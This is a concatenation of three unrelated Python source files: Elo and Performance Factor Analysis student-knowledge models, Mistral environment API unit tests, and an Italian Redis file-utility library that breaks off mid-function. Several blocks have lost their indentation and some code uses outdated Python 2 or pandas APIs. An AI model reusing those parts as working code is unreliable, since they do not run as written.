    def __init__(self, alpha=1, beta=0.05):
        # alpha/beta control how quickly updates shrink with the number of
        # prior answers; see `uncertainty`.
        self.alpha = alpha
        self.beta = beta
        self.init_model()

    def init_model(self):
        """Initializes two attributes of the model. Both attributes are
        dataframes. The first attribute represents difficulties of countries.
        The second attribute represents global knowledge of students.

        NOTE(review): despite the wording above, these are keyed
        default-dicts of Place / User objects, not dataframes.
        """
        self.places = tools.keydefaultdict(Place)
        self.users = tools.keydefaultdict(User)
        self.predictions = {}  # answer id -> predicted P(correct)

    def uncertainty(self, n):
        """Uncertainty function. The purpose is to make each update on
        the model trained with sequence of `n` answers less and less
        significant as the number of prior answers is bigger.

        :param n: Number of user's answers or total answers to a place.
        :type n: int
        """
        return self.alpha / (1 + self.beta * n)

    def predict(self, question):
        """Returns probability of correct answer for given question.

        :param question: Asked question.
        :type question: :class:`pandas.Series` or :class:`Question`
        """
        user = self.users[question.user_id]
        place = self.places[question.place_id]
        # Logistic of the skill/difficulty gap, adjusted for guessing.
        prediction = tools.sigmoid(user.skill - place.difficulty)
        return self.respect_guess(prediction, question.options)

    def update(self, answer):
        """Updates skills of users and difficulties of places according
        to given answer.

        :param answer: Answer to a question.
        :type answer: :class:`pandas.Series`
        """
        user = self.users[answer.user_id]
        place = self.places[answer.place_id]

        prediction = self.predict(answer)
        # Positive shift when the user beat the prediction, negative otherwise.
        shift = answer.is_correct - prediction

        user.inc_skill(self.uncertainty(user.answers_count) * shift)
        place.inc_difficulty(-(self.uncertainty(place.answers_count) * shift))

        self.predictions[answer.id] = prediction

    def train(self, data):
        """Trains the model on given data set.

        :param data: Data set on which to train the model.
        :type data: :class:`pandas.DataFrame`
        """
        self.init_model()
        # Elo is trained on first answers only.
        data = tools.first_answers(data)
        # NOTE(review): DataFrame.sort() is the pre-0.20 pandas API;
        # sort_values('inserted') is the modern equivalent -- confirm the
        # pandas version pinned for this project.
        data.sort(['inserted']).apply(self.update, axis=1)

    @classmethod
    def split_data(cls, data, ratio=0.7):
        """Classmethod that splits data into training set and test set.

        :param data: The object containing data.
        :type data: :class:`pandas.DataFrame`.
        :param ratio: What portion of data to include in the training set
            and the test set. :obj:`0.5` means that the data will be
            distributed equaly.
        :type ratio: float
        """
        data = tools.first_answers(data)
        return tools.split_data(data, ratio=ratio)
class EloResponseTime(EloModel):
    """Extension of the Elo model that takes response time of user
    into account.
    """

    ABBR = 'Elo/RT'

    def __init__(self, *args, **kwargs):
        # zeta weighs the model's prediction against the response-time-based
        # automaticity level; larger zeta means response time matters less.
        self.zeta = kwargs.pop('zeta', 3)
        super(EloResponseTime, self).__init__(*args, **kwargs)

    def update(self, answer):
        """Updates skills of users and difficulties of places according
        to given answer.

        :param answer: Answer to a question.
        :type answer: :class:`pandas.Series` or :class:`Answer`
        """
        user = self.users[answer.user_id]
        place = self.places[answer.place_id]

        prediction = self.predict(answer)
        level = tools.automaticity_level(answer.response_time)
        # Blend the prediction with the automaticity level before computing
        # the shift; the stored prediction stays unblended.
        prob = (prediction * self.zeta + level) / (self.zeta + 1)
        shift = answer.is_correct - prob

        user.inc_skill(self.uncertainty(user.answers_count) * shift)
        place.inc_difficulty(-(self.uncertainty(place.answers_count) * shift))

        self.predictions[answer.id] = prediction
class PFAModel(Model):
    """Standard Performance Factor Analysis.

    :param gamma: The significance of the update when the student
        answered correctly.
    :type gamma: float
    :param delta: The significance of the update when the student
        answered incorrectly.
    :type delta: float
    """

    ABBR = 'PFA'

    def __init__(self, prior=None, gamma=3.4, delta=-0.3):
        super(PFAModel, self).__init__()
        # The prior model supplies initial skills/difficulties; the dummy
        # prior keeps them at zero.
        self.prior = prior or DummyPriorModel()
        self.gamma = gamma
        self.delta = delta
        self.init_model()

    def init_model(self):
        """Initializes attribute of the model that stores current
        knowledge of places for all students.
        """
        # Items are keyed by (user_id, place_id) tuples.
        self.items = tools.keydefaultdict(
            lambda *args: Item(self.prior, *args)
        )
        self.predictions = {}  # answer id -> predicted P(correct)

    def predict(self, question):
        """Returns probability of correct answer for given question.

        :param question: Asked question.
        :type question: :class:`pandas.Series` or :class:`Question`
        """
        item = self.items[question.user_id, question.place_id]
        # Standard PFA: logit is prior knowledge plus weighted counts of
        # past correct/incorrect practices.
        knowledge = (
            item.knowledge +
            self.gamma * len(item.correct) +
            self.delta * len(item.incorrect)
        )
        return tools.sigmoid(knowledge)

    def update(self, answer):
        """Performes update of current knowledge of a user based on the
        given answer.

        :param answer: Answer to a question.
        :type answer: :class:`pandas.Series` or :class:`Answer`
        """
        item = self.items[answer.user_id, answer.place_id]

        # Let the prior model adapt only on the first practice of an item.
        if not item.practices:
            self.prior.update(answer)

        prediction = self.predict(answer)
        self.predictions[answer.id] = prediction
        item.add_practice(answer)

    def train(self, data):
        """Trains the model on given data set.

        :param data: Data set on which to train the model.
        :type data: :class:`pandas.DataFrame`
        """
        self.init_model()
        # NOTE(review): DataFrame.sort() is the pre-0.20 pandas API;
        # sort_values('inserted') is the modern equivalent -- confirm pins.
        data.sort(['inserted']).apply(self.update, axis=1)

    @classmethod
    def split_data(self, data):
        """Classmethod that splits data into training set and test set.

        NOTE(review): the first parameter is conventionally named `cls` on a
        classmethod -- it receives the class object here, not an instance.

        :param data: The object containing data.
        :type data: :class:`pandas.DataFrame`.
        """
        test_set = tools.last_answers(data)
        train_set = data[~data['id'].isin(test_set['id'])]
        return train_set, test_set
class PFAExt(PFAModel):
    """PFA model for estimation of current knowledge.

    :param gamma: The significance of the update when the student
        answered correctly.
    :type gamma: float
    :param delta: The significance of the update when the student
        answered incorrectly.
    :type delta: float
    """

    ABBR = 'PFA/E'

    def predict(self, question):
        """Returns probability of correct answer for given question.

        :param question: Asked question.
        :type question: :class:`pandas.Series` or :class:`Question`
        """
        item = self.items[question.user_id, question.place_id]
        # Unlike standard PFA, the practice history is already folded into
        # item.knowledge by `update`, so no counts are added here.
        prediction = tools.sigmoid(item.knowledge)
        return self.respect_guess(prediction, question.options)

    def update(self, answer):
        """Performes update of current knowledge of a user based on the
        given answer.

        :param answer: Answer to a question.
        :type answer: :class:`pandas.Series` or :class:`Answer`
        """
        item = self.items[answer.user_id, answer.place_id]

        # Let the prior model adapt only on the first practice of an item.
        if not item.practices:
            self.prior.update(answer)

        prediction = self.predict(answer)
        self.predictions[answer.id] = prediction
        item.add_practice(answer)

        # Asymmetric update: a surprising success (low prediction) raises
        # knowledge more; a confident failure lowers it more.
        if answer.is_correct:
            item.inc_knowledge(self.gamma * (1 - prediction))
        else:
            item.inc_knowledge(self.delta * prediction)
class PFAResponseTime(PFAExt):
    """An extended version of the PFAExt model which alters student's
    knowledge by respecting past response times.

    :param gamma: The significance of the update when the student
        answered correctly.
    :type gamma: float
    :param delta: The significance of the update when the student
        answered incorrectly.
    :type delta: float
    :param zeta: The significance of response times.
    :type zeta: float
    """
    ABBR = 'PFA/E/RT'

    def __init__(self, *args, **kwargs):
        kwargs.setdefault('gamma', 1.5)
        kwargs.setdefault('delta', -1.4)
        self.zeta = kwargs.pop('zeta', 1.9)
        super(PFAResponseTime, self).__init__(*args, **kwargs)

    def update(self, answer):
        """Performes update of current knowledge of a user based on the
        given answer, taking the response time into account.

        :param answer: Answer to a question.
        :type answer: :class:`pandas.Series` or :class:`Answer`
        """
        practiced = self.items[answer.user_id, answer.place_id]
        if not practiced.practices:
            self.prior.update(answer)
        estimate = self.predict(answer)
        self.predictions[answer.id] = estimate
        practiced.add_practice(answer)
        # Faster (more automatic) responses contribute a larger bonus.
        speed_bonus = tools.automaticity_level(answer.response_time) / self.zeta
        if answer.is_correct:
            practiced.inc_knowledge(self.gamma * (1 - estimate) + speed_bonus)
        else:
            practiced.inc_knowledge(self.delta * estimate + speed_bonus)
class PFAExtTiming(PFAExt):
    """Alternative version of :class:`PFAExtSpacing` which ignores
    spacing effect. Only forgetting is considered.

    :param gamma: The significance of the update when the student
        answered correctly.
    :type gamma: float
    :param delta: The significance of the update when the student
        answered incorrectly.
    :type delta: float
    :param time_effect_fun: Time effect function.
    :type time_effect_fun: callable or string
    """
    ABBR = 'PFA/E/T'

    def __init__(self, *args, **kwargs):
        kwargs.setdefault('gamma', 2.3)
        kwargs.setdefault('delta', -0.9)
        effect = kwargs.pop('time_effect_fun', 'poly')
        if isinstance(effect, basestring):
            # Named time-effect function; optional a/c parameters tune it.
            self.a, self.c = kwargs.pop('a', None), kwargs.pop('c', None)
            self.time_effect = init_time_effect(self, effect)
        else:
            self.time_effect = effect
        super(PFAExtTiming, self).__init__(*args, **kwargs)

    def predict(self, question):
        """Returns probability of correct answer for given question.

        :param question: Asked question.
        :type question: :class:`pandas.Series` or :class:`Question`
        """
        practiced = self.items[question.user_id, question.place_id]
        if practiced.practices:
            elapsed = tools.time_diff(question.inserted, practiced.last_inserted)
            decay = self.time_effect(elapsed)
        else:
            # No previous practice -- nothing has been forgotten yet.
            decay = 0
        raw = tools.sigmoid(practiced.knowledge + decay)
        return self.respect_guess(raw, question.options)
class PFAExtStaircase(PFAExtTiming):
    """Alternative version of :class:`PFAESpacing` which ignores
    spacing effect. Only forgetting is considered, modelled by a
    staircase function.

    :param gamma: The significance of the update when the student
        answered correctly.
    :type gamma: float
    :param delta: The significance of the update when the student
        answered incorrectly.
    :type delta: float
    :param time_effect_fun: Values for staircase function.
    :type time_effect_fun: dict (tuples as keys)
    """
    ABBR = 'PFA/E/T staircase'

    def __init__(self, *args, **kwargs):
        kwargs.setdefault('gamma', 2.5)
        kwargs.setdefault('delta', -0.8)
        self.staircase = tools.intervaldict(kwargs.pop('staircase'))
        self.time_effect = lambda interval: self.staircase[interval]
        # Deliberately skips PFAExtTiming.__init__ (the time effect is
        # already configured here) and runs PFAExt.__init__ instead.
        super(PFAExtTiming, self).__init__(*args, **kwargs)
class PFAExtSpacing(PFAExtTiming):
    """Extended version of PFA that takes into account the effect of
    forgetting and spacing.

    :param gamma: The significance of the update when the student
        answers correctly.
    :type gamma: float
    :param delta: The significance of the update when the student
        answers incorrectly.
    :type delta: float
    :param spacing_rate: The significance of the spacing effect. Lower
        values make the effect less significant. If the spacing rate
        is set to zero, the model is unaware of the spacing effect.
    :type spacing_rate: float
    :param decay_rate: The significance of the forgetting effect. Higher
        values of decay rate make the students forget the item faster
        and vice versa.
    :type decay_rate: float
    """
    ABBR = 'PFA/E/S'

    def __init__(self, *args, **kwargs):
        kwargs.setdefault('gamma', 2.8)
        kwargs.setdefault('delta', -0.7)
        self.spacing_rate = kwargs.pop('spacing_rate', 0)
        self.decay_rate = kwargs.pop('decay_rate', 0.18)
        self.iota = kwargs.pop('iota', 1.5)
        super(PFAExtSpacing, self).__init__(*args, **kwargs)

    def memory_strength(self, question):
        """Estimates memory strength of an item.

        :param question: Asked question.
        :type question: :class:`pandas.Series`
        """
        practiced = self.items[question.user_id, question.place_id]
        gaps = practiced.get_diffs(question.inserted)
        if len(gaps) > 0:
            # Only positive time differences count as real practices.
            positive = filter(lambda gap: gap > 0, gaps)
            return self.iota + tools.memory_strength(
                positive,
                spacing_rate=self.spacing_rate,
                decay_rate=self.decay_rate,
            )

    def predict(self, question):
        """Returns probability of correct answer for given question.

        :param question: Asked question.
        :type question: :class:`pandas.Series` or :class:`Question`
        """
        practiced = self.items[question.user_id, question.place_id]
        strength = (
            self.memory_strength(question) if practiced.any_incorrect else 0
        )
        raw = tools.sigmoid(practiced.knowledge + strength)
        return self.respect_guess(raw, question.options)
class PFAGong(PFAModel):
    """Yue Gong's extended Performance Factor Analysis.

    :param gamma: The significance of the update when the student
        answers correctly.
    :type gamma: float
    :param delta: The significance of the update when the student
        answers incorrectly.
    :type delta: float
    :param decay: Decay rate of answers.
    :type decay: float
    """
    ABBR = 'PFA/G'

    def __init__(self, *args, **kwargs):
        kwargs.setdefault('gamma', 2.1)
        kwargs.setdefault('delta', -0.8)
        self.decay = kwargs.pop('decay', 0.8)
        super(PFAGong, self).__init__(*args, **kwargs)

    def get_weights(self, item, question):
        """Returns weights of previous answers to the given item.

        :param item: *Item* (i.e. practiced place by a user).
        :type item: :class:`Item`
        :param question: Asked question.
        :type question: :class:`pandas.Series` or :class:`Question`
        """
        corrects = []
        incorrects = []
        # Older answers get exponentially smaller weight (decay ** age).
        for age, past in tools.reverse_enumerate(item.practices):
            weight = self.decay ** age
            corrects.append(past.is_correct * weight)
            incorrects.append((1 - past.is_correct) * weight)
        return sum(corrects), sum(incorrects)

    def predict(self, question):
        """Returns probability of correct answer for given question.

        :param question: Asked question.
        :type question: :class:`pandas.Series` or :class:`Question`
        """
        practiced = self.items[question.user_id, question.place_id]
        right, wrong = self.get_weights(practiced, question)
        strength = (
            practiced.knowledge +
            self.gamma * right +
            self.delta * wrong
        )
        return self.respect_guess(tools.sigmoid(strength), question.options)

    def update(self, answer):
        """Performes update of current knowledge of a user based on the
        given answer.

        :param answer: Answer to a question.
        :type answer: :class:`pandas.Series` or :class:`Answer`
        """
        practiced = self.items[answer.user_id, answer.place_id]
        if not practiced.practices:
            self.prior.update(answer)
        self.predictions[answer.id] = self.predict(answer)
        practiced.add_practice(answer)
class PFAGongTiming(PFAGong):
    """Performance Factor Analysis combining some aspects of both
    the Yue Gong's PFA and the ACT-R model.

    :param gamma: The significance of the update when the student
        answers correctly.
    :type gamma: float
    :param delta: The significance of the update when the student
        answers incorrectly.
    :type delta: float
    :param time_effect_fun: Time effect function.
    :type time_effect_fun: callable or string
    """
    ABBR = 'PFA/G/T old'

    def __init__(self, *args, **kwargs):
        kwargs.setdefault('gamma', 1.7)
        kwargs.setdefault('delta', 0.5)
        effect = kwargs.pop('time_effect_fun', 'pow')
        if isinstance(effect, basestring):
            self.a, self.c = kwargs.pop('a', None), kwargs.pop('c', None)
            self.time_effect = init_time_effect(self, effect)
        else:
            self.time_effect = effect
        # Intentionally skips PFAGong.__init__; the decay parameter is
        # not used by this model.
        super(PFAGong, self).__init__(*args, **kwargs)

    def get_weights(self, item, question):
        """Returns weights of previous answers to the given item.

        :param item: *Item* (i.e. practiced place by a user).
        :type item: :class:`Item`
        :param question: Asked question.
        :type question: :class:`pandas.Series` or :class:`Question`
        """
        corrects = []
        incorrects = []
        for past, gap in izip(item.practices, item.get_diffs(question.inserted)):
            effect = self.time_effect(gap)
            # Correct answers never contribute a negative weight.
            corrects.append(max(past.is_correct * effect, 0))
            incorrects.append((1 - past.is_correct) * effect)
        return sum(corrects), sum(incorrects)
class PFATiming(PFAGong):
    """Performance Factor Analysis combining some aspects of both
    the Yue Gong's PFA and the ACT-R model.

    :param gamma: The significance of the update when the student
        answers correctly.
    :type gamma: float
    :param delta: The significance of the update when the student
        answers incorrectly.
    :type delta: float
    :param time_effect_good: Time effect function for correct answers.
    :type time_effect_good: callable or string
    :param time_effect_bad: Time effect function for wrong answers.
    :type time_effect_bad: callable or string
    """
    ABBR = 'PFA/G/T'

    def __init__(self, *args, **kwargs):
        # These two parameters should not be modified, i.e. kept equal to 1.
        kwargs.setdefault('gamma', 1)
        kwargs.setdefault('delta', 1)
        good = kwargs.pop('time_effect_good', 'pow')
        bad = kwargs.pop('time_effect_bad', 'pow')
        if isinstance(good, basestring):
            self.a, self.c = kwargs.pop('a', None), kwargs.pop('c', None)
            self.time_effect_good = init_time_effect(
                self, good, parameters=('a', 'c'))
        else:
            self.time_effect_good = good
        if isinstance(bad, basestring):
            self.b, self.d = kwargs.pop('b', None), kwargs.pop('d', None)
            self.time_effect_bad = init_time_effect(
                self, bad, parameters=('b', 'd'))
        else:
            self.time_effect_bad = bad
        # Intentionally skips PFAGong.__init__ (no decay parameter here).
        super(PFAGong, self).__init__(*args, **kwargs)

    def get_weights(self, item, question):
        """Returns weights of previous answers to the given item.

        :param item: *Item* (i.e. practiced place by a user).
        :type item: :class:`Item`
        :param question: Asked question.
        :type question: :class:`pandas.Series` or :class:`Question`
        """
        corrects = []
        incorrects = []
        for past, gap in izip(item.practices, item.get_diffs(question.inserted)):
            corrects.append(past.is_correct * self.time_effect_good(gap))
            incorrects.append((1 - past.is_correct) * self.time_effect_bad(gap))
        return sum(corrects), sum(incorrects)
|
# Copyright 2015 - StackStorm, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import datetime
import json
import mock
import six
import sqlalchemy as sa
from mistral.api.controllers.v2 import resources
from mistral.db.v2 import api as db_api
from mistral.db.v2.sqlalchemy import models as db
from mistral import exceptions as exc
from mistral.tests.unit.api import base
from oslo_utils import uuidutils
DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S.%f'
# Sample environment variables; '__actions' provides per-action defaults
# that the engine substitutes via <% env() %> expressions.
VARIABLES = {
    'host': 'localhost',
    'db': 'test',
    'timeout': 600,
    'verbose': True,
    '__actions': {
        'std.sql': {
            'conn': 'mysql://admin:secret@<% env().host %>/<% env().db %>'
        }
    }
}
# Request payloads for POST/PUT; the *_FOR_UPDATE variants differ only in
# whether an explicit 'scope' is supplied.
ENVIRONMENT_FOR_CREATE = {
    'name': 'test',
    'description': 'my test settings',
    'variables': VARIABLES,
}
ENVIRONMENT_FOR_UPDATE = {
    'name': 'test',
    'description': 'my test settings',
    'variables': VARIABLES,
    'scope': 'private'
}
ENVIRONMENT_FOR_UPDATE_NO_SCOPE = {
    'name': 'test',
    'description': 'my test settings',
    'variables': VARIABLES
}
# Full environment as the API is expected to return it.
ENVIRONMENT = {
    'id': uuidutils.generate_uuid(),
    'name': 'test',
    'description': 'my test settings',
    'variables': VARIABLES,
    'scope': 'private',
    'project_id': '<default-project>',
    'created_at': str(datetime.datetime.utcnow()),
    'updated_at': str(datetime.datetime.utcnow())
}
# Payload with a field the API schema does not allow; used to check 400s.
ENVIRONMENT_WITH_ILLEGAL_FIELD = {
    'id': uuidutils.generate_uuid(),
    'name': 'test',
    'description': 'my test settings',
    'extra_field': 'I can add whatever I want here',
    'variables': VARIABLES,
    'scope': 'private',
}
# DB-model twin of ENVIRONMENT (timestamps parsed back into datetimes).
ENVIRONMENT_DB = db.Environment(
    id=ENVIRONMENT['id'],
    name=ENVIRONMENT['name'],
    description=ENVIRONMENT['description'],
    variables=copy.deepcopy(VARIABLES),
    scope=ENVIRONMENT['scope'],
    project_id=ENVIRONMENT['project_id'],
    created_at=datetime.datetime.strptime(ENVIRONMENT['created_at'],
                                          DATETIME_FORMAT),
    updated_at=datetime.datetime.strptime(ENVIRONMENT['updated_at'],
                                          DATETIME_FORMAT)
)
ENVIRONMENT_DB_WITH_PROJECT_ID = ENVIRONMENT_DB.get_clone()
ENVIRONMENT_DB_WITH_PROJECT_ID.project_id = '<default-project>'
ENVIRONMENT_DB_DICT = {k: v for k, v in ENVIRONMENT_DB.items()}
# Variants used by the PUT tests: same environment with a changed host.
UPDATED_VARIABLES = copy.deepcopy(VARIABLES)
UPDATED_VARIABLES['host'] = '127.0.0.1'
FOR_UPDATED_ENVIRONMENT = copy.deepcopy(ENVIRONMENT_FOR_UPDATE)
FOR_UPDATED_ENVIRONMENT['variables'] = json.dumps(UPDATED_VARIABLES)
UPDATED_ENVIRONMENT = copy.deepcopy(ENVIRONMENT)
UPDATED_ENVIRONMENT['variables'] = json.dumps(UPDATED_VARIABLES)
UPDATED_ENVIRONMENT_DB = db.Environment(**ENVIRONMENT_DB_DICT)
UPDATED_ENVIRONMENT_DB.variables = copy.deepcopy(UPDATED_VARIABLES)
# Canned mocks for the db_api layer used via @mock.patch.object below.
MOCK_ENVIRONMENT = mock.MagicMock(return_value=ENVIRONMENT_DB)
MOCK_ENVIRONMENTS = mock.MagicMock(return_value=[ENVIRONMENT_DB])
MOCK_UPDATED_ENVIRONMENT = mock.MagicMock(return_value=UPDATED_ENVIRONMENT_DB)
MOCK_EMPTY = mock.MagicMock(return_value=[])
MOCK_NOT_FOUND = mock.MagicMock(side_effect=exc.DBEntityNotFoundError())
MOCK_DUPLICATE = mock.MagicMock(side_effect=exc.DBDuplicateEntryError())
MOCK_DELETE = mock.MagicMock(return_value=None)
def _convert_vars_to_dict(env_dict):
    """Converts 'variables' in the given environment dict into dictionary."""
    variables = env_dict.get('variables')
    if isinstance(variables, six.string_types):
        env_dict['variables'] = json.loads(variables)
    return env_dict
def _convert_vars_to_json(env_dict):
"""Converts 'variables' in the given environment dict into string."""
if ('variables' in env_dict and
isinstance(env_dict.get('variables'), dict)):
env_dict['variables'] = json.dumps(env_dict['variables'])
return env_dict
class TestEnvironmentController(base.APITest):
    """Tests for the /v2/environments REST controller.

    All db_api calls are mocked; the tests only assert HTTP status codes
    and response payloads.
    """

    def _assert_dict_equal(self, expected, actual):
        """Compares two environments, normalizing 'variables' to dicts first."""
        self.assertIsInstance(expected, dict)
        self.assertIsInstance(actual, dict)
        _convert_vars_to_dict(expected)
        _convert_vars_to_dict(actual)
        self.assertDictEqual(expected, actual)

    def test_resource(self):
        # The resource object must round-trip through to_dict() unchanged.
        resource = resources.Environment(**copy.deepcopy(ENVIRONMENT))
        self._assert_dict_equal(
            copy.deepcopy(ENVIRONMENT),
            resource.to_dict()
        )

    @mock.patch.object(db_api, 'get_environments', MOCK_ENVIRONMENTS)
    def test_get_all(self):
        resp = self.app.get('/v2/environments')
        self.assertEqual(200, resp.status_int)
        self.assertEqual(1, len(resp.json['environments']))

    @mock.patch.object(db_api, 'get_environments')
    def test_get_all_operational_error(self, mocked_get_all):
        # A transient DB error must be retried transparently by the API.
        mocked_get_all.side_effect = [
            # Emulating DB OperationalError
            sa.exc.OperationalError('Mock', 'mock', 'mock'),
            [ENVIRONMENT_DB]  # Successful run
        ]
        resp = self.app.get('/v2/environments')
        self.assertEqual(200, resp.status_int)
        self.assertEqual(1, len(resp.json['environments']))
        self._assert_dict_equal(ENVIRONMENT, resp.json['environments'][0])

    def test_get_all_empty(self):
        resp = self.app.get('/v2/environments')
        self.assertEqual(200, resp.status_int)
        self.assertEqual(0, len(resp.json['environments']))

    @mock.patch.object(db_api, 'get_environment', MOCK_ENVIRONMENT)
    def test_get(self):
        resp = self.app.get('/v2/environments/123')
        self.assertEqual(200, resp.status_int)
        self._assert_dict_equal(ENVIRONMENT, resp.json)

    @mock.patch.object(db_api, 'get_environment')
    def test_get_operational_error(self, mocked_get):
        # Same retry behaviour as test_get_all_operational_error, for GET one.
        mocked_get.side_effect = [
            # Emulating DB OperationalError
            sa.exc.OperationalError('Mock', 'mock', 'mock'),
            ENVIRONMENT_DB  # Successful run
        ]
        resp = self.app.get('/v2/environments/123')
        self.assertEqual(200, resp.status_int)
        self._assert_dict_equal(ENVIRONMENT, resp.json)

    @mock.patch.object(db_api, 'get_environment',
                       return_value=ENVIRONMENT_DB_WITH_PROJECT_ID)
    def test_get_within_project_id(self, mock_get):
        resp = self.app.get('/v2/environments/123')
        self.assertEqual(200, resp.status_int)
        self.assertEqual('<default-project>', resp.json['project_id'])

    @mock.patch.object(db_api, "get_environment", MOCK_NOT_FOUND)
    def test_get_not_found(self):
        resp = self.app.get('/v2/environments/123', expect_errors=True)
        self.assertEqual(404, resp.status_int)

    @mock.patch.object(db_api, 'create_environment', MOCK_ENVIRONMENT)
    def test_post(self):
        resp = self.app.post_json(
            '/v2/environments',
            _convert_vars_to_json(copy.deepcopy(ENVIRONMENT_FOR_CREATE))
        )
        self.assertEqual(201, resp.status_int)
        self._assert_dict_equal(copy.deepcopy(ENVIRONMENT), resp.json)

    @mock.patch.object(db_api, 'create_environment', MOCK_ENVIRONMENT)
    def test_post_with_illegal_field(self):
        resp = self.app.post_json(
            '/v2/environments',
            _convert_vars_to_json(
                copy.deepcopy(ENVIRONMENT_WITH_ILLEGAL_FIELD)),
            expect_errors=True
        )
        self.assertEqual(400, resp.status_int)

    @mock.patch.object(db_api, 'create_environment', MOCK_DUPLICATE)
    def test_post_dup(self):
        resp = self.app.post_json(
            '/v2/environments',
            _convert_vars_to_json(copy.deepcopy(ENVIRONMENT_FOR_CREATE)),
            expect_errors=True
        )
        self.assertEqual(409, resp.status_int)

    @mock.patch.object(db_api, 'create_environment', MOCK_ENVIRONMENT)
    def test_post_default_scope(self):
        env = _convert_vars_to_json(copy.deepcopy(ENVIRONMENT_FOR_CREATE))
        resp = self.app.post_json('/v2/environments', env)
        self.assertEqual(201, resp.status_int)
        self._assert_dict_equal(copy.deepcopy(ENVIRONMENT), resp.json)

    @mock.patch.object(db_api, 'update_environment', MOCK_UPDATED_ENVIRONMENT)
    def test_put(self):
        resp = self.app.put_json(
            '/v2/environments',
            copy.deepcopy(FOR_UPDATED_ENVIRONMENT)
        )
        self.assertEqual(200, resp.status_int)
        self._assert_dict_equal(UPDATED_ENVIRONMENT, resp.json)

    @mock.patch.object(db_api, 'update_environment', MOCK_UPDATED_ENVIRONMENT)
    def test_put_default_scope(self):
        env = copy.deepcopy(ENVIRONMENT_FOR_UPDATE_NO_SCOPE)
        # BUGFIX: serialize only the variables. The previous code did
        # json.dumps(env), stuffing the entire environment dict into the
        # 'variables' field and sending a malformed payload.
        env['variables'] = json.dumps(env['variables'])
        resp = self.app.put_json('/v2/environments', env)
        self.assertEqual(200, resp.status_int)
        self._assert_dict_equal(copy.deepcopy(UPDATED_ENVIRONMENT), resp.json)

    @mock.patch.object(db_api, 'update_environment', MOCK_NOT_FOUND)
    def test_put_not_found(self):
        env = copy.deepcopy(FOR_UPDATED_ENVIRONMENT)
        resp = self.app.put_json(
            '/v2/environments',
            env,
            expect_errors=True
        )
        self.assertEqual(404, resp.status_int)

    @mock.patch.object(db_api, 'delete_environment', MOCK_DELETE)
    def test_delete(self):
        resp = self.app.delete('/v2/environments/123')
        self.assertEqual(204, resp.status_int)

    @mock.patch.object(db_api, 'delete_environment', MOCK_NOT_FOUND)
    def test_delete_not_found(self):
        resp = self.app.delete('/v2/environments/123', expect_errors=True)
        self.assertEqual(404, resp.status_int)
|
#!/usr/bin/env python3
"""
Function Library T w/ Redis
Libreria
Funzioni
T
Conterra` funzioni specifiche, ma anche quelle generali,
per ora ho separato quelle della gestione json file e pagine html,
tutte le altre funzioni pensavo di metterle qua.
Appunto: pensavo .. e invece ..
Aggiornamenti: Sat 19 Mar 2016 08:30:53 AM CET
Aggiornamento: Sun 09 Oct 2016 10:33:55 AM CEST
"""
import redis,os,socket,time
# La mia libreria Json
import mjl
# MQTT (copio dall'esempio)
import sys
try:
import paho.mqtt.publish as publish
except ImportError:
# This part is only required to run the example from within the examples
# directory when the module itself is not installed.
#
# If you have the module installed, just use "import paho.mqtt.publish"
import os
import inspect
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"../src")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
import paho.mqtt.publish as publish
# This helper is tightly coupled to the JSON configuration format; keeping
# the configuration parsing inline avoids a separate config module.
def OpenDBFile(ConfigFile):
    """Open a Redis connection using settings read from a JSON config file.

    The file is expected to contain a list of {"name": ..., "value": ...}
    entries; the entry named "redis" holds the connection parameters.
    """
    # Read the configuration file.
    ConfigNow = mjl.ReadJsonFile(ConfigFile)
    for entry in ConfigNow:
        if entry["name"] == "redis":
            ConfigNow = entry["value"]
            # BUGFIX: stop here. The original kept iterating after the
            # reassignment, so the next iteration indexed into the replaced
            # value instead of the original list.
            break
    DB = redis.StrictRedis(host=mjl.SearchValueJsonVar(ConfigNow, "hostname"), port=mjl.SearchValueJsonVar(ConfigNow, "port"), db=mjl.SearchValueJsonVar(ConfigNow, "db"), password=mjl.SearchValueJsonVar(ConfigNow, "password"))
    return DB
# Open a Redis database from explicit connection parameters.
def OpenDB(Host, Port, Database, Password):
    """Return a StrictRedis client for the given host/port/db/password."""
    return redis.StrictRedis(host=Host, port=Port, db=Database, password=Password)
# Helper for the bytes -> str decoding of values read from Redis.
def Decode(TxT):
    """Decode a bytes value into a str using unicode_escape."""
    decoded = TxT.decode('unicode_escape')
    return decoded
# Decode a whole list of bytes values.
def DecodeList(List):
    """Return a list with every element decoded via unicode_escape."""
    decoded = []
    for item in List:
        decoded.append(item.decode('unicode_escape'))
    return decoded
# Controlla se esiste un "field" di una "key" tipo "hash"
# e restituisce il contenuto, altrimenti restituisce 'none'
def CheckKeyHashField(DB,Hash,Field):
FieldValue="none"
if DB.hexists(Hash,Field):
FieldValue=DB.hget(Hash,Field)
return FieldValue
# Open/read a file and return its contents.
def ReadFile(Filename):
    """Read the whole file and return its contents as a string.

    Prints an error and returns the string "errore" when the file does
    not exist (original error convention preserved).
    """
    if os.path.exists(Filename):
        # Context manager guarantees the handle is closed even on error;
        # the original left the file open if read() raised.
        with open(Filename, "r") as FileTemp:
            return FileTemp.read()
    print ("Errore, manca il file", Filename)
    return "errore"
# Create a file and write data into it.
def WriteFileData(Filename, Dato):
    """Create Filename and write Dato into it.

    Refuses to overwrite: if the file already exists it prints an error
    and terminates the program (original behaviour preserved).
    """
    if not os.path.exists(Filename):
        # Context manager closes the handle even if write() raises.
        with open(Filename, "w") as FileTemp:
            FileTemp.write(Dato)
    else:
        print ("Errore, il file \"{}\" esiste gia`!".format(Filename))
        exit()
# Append data to an existing file, opening and closing it.
def AddFileData(Filename, Dato):
    """Append Dato to an existing file.

    Prints an error and terminates the program when the file is missing
    (original behaviour preserved).
    """
    if os.path.exists(Filename):
        # Context manager closes the handle even if write() raises.
        with open(Filename, "a") as FileTemp:
            FileTemp.write(Dato)
    else:
        print ("Errore, manca il file", Filename)
        exit()
# Check that a TCP connection can be established.
def NetCheck(Hostname, Port):
    """Try a TCP connection to Hostname:Port.

